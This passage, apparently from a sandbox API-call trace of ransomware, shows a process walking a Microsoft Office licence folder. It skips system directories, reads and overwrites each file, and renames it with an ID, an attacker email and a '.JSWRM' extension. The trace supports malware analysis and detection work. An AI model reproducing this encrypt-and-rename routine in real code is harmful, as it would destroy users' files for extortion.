cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0109.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0109.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Grace-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0109.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.538] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11609) returned 1 [0109.538] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0109.539] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0109.541] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.541] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0109.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.541] CloseHandle (hObject=0x45c) returned 1 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0109.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0109.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.541] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0109.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0109.542] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea8eaa33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea8eaa33, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea9f5ab2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PUBLIS~3.XRM")) returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.542] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.543] lstrcmpiW (lpString1="PublisherR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0109.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0109.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.543] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10651) returned 1 [0109.544] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.544] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.546] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.546] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.546] CloseHandle (hObject=0x45c) returned 1 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0109.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0109.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0109.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0109.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0109.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.548] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea95d150, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea95d150, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaa681e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PUF0EC~1.XRM")) returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.548] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.549] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20783) returned 1 [0109.549] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0109.549] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0109.593] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.593] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0109.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.593] CloseHandle (hObject=0x45c) returned 1 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0109.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0109.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.595] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeab26d98, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeab26d98, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeacca82f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d52, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PU6F8B~1.XRM")) returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.595] lstrcmpiW 